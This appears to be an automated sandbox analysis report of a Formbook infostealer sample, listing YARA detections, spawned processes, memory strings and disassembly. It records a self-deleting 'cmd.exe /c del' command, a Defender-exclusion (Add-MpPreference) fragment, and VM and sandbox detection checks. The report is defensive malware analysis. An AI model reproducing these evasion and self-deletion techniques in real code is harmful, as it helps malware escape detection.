          Source: 0000000D.00000002.918604632.0000000003540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.679714687.0000000003DE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.763453752.0000000001560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.SKlGhwkzTi.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.SKlGhwkzTi.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.SKlGhwkzTi.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.0.SKlGhwkzTi.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SKlGhwkzTi.exe.3de9930.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: SKlGhwkzTi.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@8/7
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SKlGhwkzTi.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_01
          Source: SKlGhwkzTi.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: SKlGhwkzTi.exeVirustotal: Detection: 31%
          Source: SKlGhwkzTi.exeReversingLabs: Detection: 41%
          Source: SKlGhwkzTi.exeString found in binary or memory: -start_number {0} -i "{1}{2}"
          Source: SKlGhwkzTi.exeString found in binary or memory: <!--StartFragment -->
          Source: SKlGhwkzTi.exeString found in binary or memory: -start_number {0} -i "{1}{2}"
          Source: SKlGhwkzTi.exeString found in binary or memory: <!--StartFragment -->
          Source: SKlGhwkzTi.exeString found in binary or memory: <<<<<<<3+<!--StartFragment -->
          Source: SKlGhwkzTi.exeString found in binary or memory: %0{0}d;-start_number {0} -i "{1}{2}"
          Source: unknownProcess created: C:\Users\user\Desktop\SKlGhwkzTi.exe 'C:\Users\user\Desktop\SKlGhwkzTi.exe'
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess created: C:\Users\user\Desktop\SKlGhwkzTi.exe C:\Users\user\Desktop\SKlGhwkzTi.exe
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKlGhwkzTi.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess created: C:\Users\user\Desktop\SKlGhwkzTi.exe C:\Users\user\Desktop\SKlGhwkzTi.exeJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exeJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKlGhwkzTi.exe'Jump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: SKlGhwkzTi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SKlGhwkzTi.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.700218908.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: SKlGhwkzTi.exe, 00000004.00000002.764137531.000000000195F000.00000040.00000001.sdmp, help.exe, 0000000D.00000002.918935858.00000000039A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SKlGhwkzTi.exe, help.exe
          Source: Binary string: help.pdbGCTL source: SKlGhwkzTi.exe, 00000004.00000002.763881170.0000000001830000.00000040.00000001.sdmp
          Source: Binary string: help.pdb source: SKlGhwkzTi.exe, 00000004.00000002.763881170.0000000001830000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.700218908.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014D9990 pushfd ; retf 0_2_014DADF2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014D65C8 push esp; retf 0_2_014D65CC
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DAC51 pushfd ; retf 0_2_014DAC52
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DACF1 pushfd ; retf 0_2_014DACF2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DACAC push eax; iretd 0_2_014DACAD
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DACA8 pushfd ; retf 0_2_014DACAA
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014DACA0 pushfd ; retf 0_2_014DACA2
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014D55E8 push esp; retf 0002h0_2_014D55F1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_014D3788 push eax; retf 0_2_014D3789
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_02C3232D push FFFFFF8Bh; iretd 0_2_02C3232F
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 0_2_052BA992 pushad ; retf 0_2_052BA999
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B2A2 push cs; ret 4_2_0041B2A3
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B3F2 push eax; ret 4_2_0041B3F8
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B3FB push eax; ret 4_2_0041B462
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B3A5 push eax; ret 4_2_0041B3F8
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041B45C push eax; ret 4_2_0041B462
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00415414 push esp; ret 4_2_00415416
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00414F46 push cs; ret 4_2_00414F47
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0041BF12 push dword ptr [8427D5C5h]; ret 4_2_0041C1FF
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00415FC5 push ebp; ret 4_2_00415FC6
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018BD0D1 push ecx; ret 4_2_018BD0E4
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_03A1D0D1 push ecx; ret 13_2_03A1D0E4
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB3A5 push eax; ret 13_2_032FB3F8
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB3FB push eax; ret 13_2_032FB462
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB3F2 push eax; ret 13_2_032FB3F8
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB2A2 push cs; ret 13_2_032FB2A3
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FBF12 push dword ptr [8427D5C5h]; ret 13_2_032FC1FF
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F4F46 push cs; ret 13_2_032F4F47
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F5FC5 push ebp; ret 13_2_032F5FC6
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032F5414 push esp; ret 13_2_032F5416
          Source: C:\Windows\SysWOW64\help.exeCode function: 13_2_032FB45C push eax; ret 13_2_032FB462
          Source: initial sampleStatic PE information: section name: .text entropy: 7.59789627336
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SKlGhwkzTi.exe PID: 6896, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000032E85E4 second address: 00000000032E85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\help.exeRDTSC instruction interceptor: First address: 00000000032E896E second address: 00000000032E8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_004088A0 rdtsc 4_2_004088A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exe TID: 6900Thread sleep time: -103480s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exe TID: 6948Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\help.exe TID: 3120Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeThread delayed: delay time: 103480Jump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000000.706696633.000000000A9A1000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.698375339.0000000004791000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA
          Source: explorer.exe, 00000006.00000000.700072671.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000006.00000000.704598471.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.700611112.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.704598471.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000006.00000000.725511730.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000006.00000000.700072671.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000006.00000000.704737422.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000006.00000000.700072671.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000006.00000000.704801923.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: SKlGhwkzTi.exe, 00000000.00000002.679347370.0000000002E23000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.700072671.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_004088A0 rdtsc 4_2_004088A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_00409B10 LdrLoadDll,4_2_00409B10
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0188C182 mov eax, dword ptr fs:[00000030h]4_2_0188C182
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0189A185 mov eax, dword ptr fs:[00000030h]4_2_0189A185
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01892990 mov eax, dword ptr fs:[00000030h]4_2_01892990
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E69A6 mov eax, dword ptr fs:[00000030h]4_2_018E69A6
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018961A0 mov eax, dword ptr fs:[00000030h]4_2_018961A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018961A0 mov eax, dword ptr fs:[00000030h]4_2_018961A0
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E51BE mov eax, dword ptr fs:[00000030h]4_2_018E51BE
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E51BE mov eax, dword ptr fs:[00000030h]4_2_018E51BE
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E51BE mov eax, dword ptr fs:[00000030h]4_2_018E51BE
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018E51BE mov eax, dword ptr fs:[00000030h]4_2_018E51BE
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019249A4 mov eax, dword ptr fs:[00000030h]4_2_019249A4
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019249A4 mov eax, dword ptr fs:[00000030h]4_2_019249A4
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019249A4 mov eax, dword ptr fs:[00000030h]4_2_019249A4
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_019249A4 mov eax, dword ptr fs:[00000030h]4_2_019249A4
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_018F41E8 mov eax, dword ptr fs:[00000030h]4_2_018F41E8
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186B1E1 mov eax, dword ptr fs:[00000030h]4_2_0186B1E1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186B1E1 mov eax, dword ptr fs:[00000030h]4_2_0186B1E1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_0186B1E1 mov eax, dword ptr fs:[00000030h]4_2_0186B1E1
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869100 mov eax, dword ptr fs:[00000030h]4_2_01869100
          Source: C:\Users\user\Desktop\SKlGhwkzTi.exeCode function: 4_2_01869100 mov eax, dword ptr fs:[00000030h]4_2_01869100
